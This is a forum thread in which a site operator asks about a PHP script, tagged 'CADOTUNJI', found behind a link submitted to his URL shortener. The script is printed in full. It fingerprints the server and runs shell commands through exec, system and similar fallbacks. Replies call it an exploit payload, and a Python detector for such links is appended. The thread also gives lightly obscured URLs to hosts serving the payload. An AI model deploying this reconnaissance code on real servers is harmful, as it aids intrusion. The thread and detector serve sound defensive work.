Thread: What is this?!

  1. #1

    What is this?!

    Someone put the following URL into my URL Shortener:
    I do not recommend clicking this link:
    http:// ta-photo .com /templates/Varages/mild.txt???

    Anyway, I visited it and it showed me this:

    PHP Code:
    <?php
    //CADOTUNJI Response
    $pwd1 = @getcwd();
    $un = @php_uname();
    $os = @PHP_OS;
    $id1 = ex("id");
    if (empty($id1)) { $id1 = @get_current_user(); }
    $sof1 = @getenv("SERVER_SOFTWARE");
    $php1 = @phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = @gethostbyname($SERVER_ADDR);
    $free1 = @diskfreespace($pwd1);
    $all1 = @disk_total_space($pwd1);
    $used = ConvertBytes($all1-$free1);
    $free = ConvertBytes(@diskfreespace($pwd1));
    if (!$free) { $free = 0; }
    $all = ConvertBytes(@disk_total_space($pwd1));
    if (!$all) { $all = 0; }
    if (@is_writable($pwd1)) { $perm = "[W]"; } else { $perm = "[R]"; }
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $sf = "ON"; } else { $sf = "OFF"; }

    echo "CADOTUNJI".$sf."<br>";
    echo "uname -a:    $un<br>";
    echo "os: $os<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software:    $sof1<br>";
    echo "srvip: $ip1<br>";
    echo "srvname: $name1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all $perm<br>";

    function ConvertBytes($number) {
        $len = strlen($number);
        if ($len < 4) { return sprintf("%d b", $number); }
        if ($len >= 4 && $len <= 6) { return sprintf("%0.2f Kb", $number/1024); }
        if ($len >= 7 && $len <= 9) { return sprintf("%0.2f Mb", $number/1024/1024); }
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
    }

    function ex($cfe) {
        $res = '';
        if (!empty($cfe)) {
            if (function_exists('exec')) {
                @exec($cfe, $res);
                $res = join("\n", $res);
            } elseif (function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            } elseif (function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cfe, "r"))) {
                $res = "";
                while (!@feof($f)) { $res .= @fread($f, 1024); }
                @pclose($f);
            } else {
                $res = "NULL";
            }
        }
        return $res;
    }

    ?>
    Is this some sort of exploit? Are they seeking vulnerabilities in my server? To be honest, I'm quite concerned.

    I removed it from the database. And I also found this, and removed it as well:
    http:// www. koreadefence .net/data/shirohige/zfxid.txt??

  2. #2
    It looks like some sort of PHP exploit but don't worry about it because if you saw that code that means it didn't work. It's not supposed to show you the source code. If you do a search for "CADOTUNJI" you will see a couple hacked websites in the search results.

  3. #3
    It displays the source code because the file name is mild.txt. With the TXT extension, it never gets run through the PHP parser.

    Perhaps the intention is to provide the source code to someone.
    "Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well-armed lamb contesting the vote." -- Benjamin Franklin


  4. #4
    Good point. It is a text file so it is harmless in that it didn't run. But it may be harmful in that if he was using a URL shortener he is probably showing this code to others, and if it's malicious code that could be bad.
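
For anyone running a URL shortener who wants to catch submissions like the one in post #1, here is an added example (not from the thread or its posters) that triages a link from its URL and the body it returns. The function names, the constructed sample URL and body, the treatment of a trailing bare `?` as padding, and the blocking policy are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Function names as they appear in the script quoted in post #1.
EXEC_CALLS = ("exec", "shell_exec", "system", "passthru", "popen")
RECON_CALLS = ("php_uname", "getcwd", "phpversion", "get_current_user",
               "disk_total_space", "diskfreespace")
SCRIPT_EXTS = (".php", ".phtml", ".php5")  # paths a server would normally execute

def _calls(body, names):
    """Names from `names` used as function calls, e.g. exec( but not shell_exec(."""
    return sorted(n for n in names
                  if re.search(r"(?<![\w$>])%s\s*\(" % re.escape(n), body))

def triage(url, body):
    """Describe why a submitted link may be PHP source parked as plain text."""
    parts = urlsplit(url)
    return {
        # Source is visible because the path is not handled by the PHP parser.
        "php_source_as_text": "<?php" in body.lower()
                              and not parts.path.lower().endswith(SCRIPT_EXTS),
        # URL ends in one or more bare '?' with no real query string.
        "query_padding": url.endswith("?") and parts.query.strip("?") == "",
        "exec_calls": _calls(body, EXEC_CALLS),
        "recon_calls": _calls(body, RECON_CALLS),
    }

def should_block(url, body):
    """Assumed policy: exposed PHP source that runs commands or fingerprints the host."""
    t = triage(url, body)
    return bool(t["php_source_as_text"]
                and (t["exec_calls"] or len(t["recon_calls"]) >= 2))

# Constructed sample: a placeholder URL and a short fragment in the style of post #1.
SAMPLE_URL = "http://example.com/templates/x/mild.txt???"
SAMPLE_BODY = """<?php
$pwd1 = @getcwd();
$un = @php_uname();
if (function_exists('exec')) { @exec($cfe, $res); }
?>"""

if __name__ == "__main__":
    print(triage(SAMPLE_URL, SAMPLE_BODY))
    print("block:", should_block(SAMPLE_URL, SAMPLE_BODY))
```

The shortener would call `should_block` with the body it fetched for the submitted link, and log the `triage` result so rejected entries can be reviewed later.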
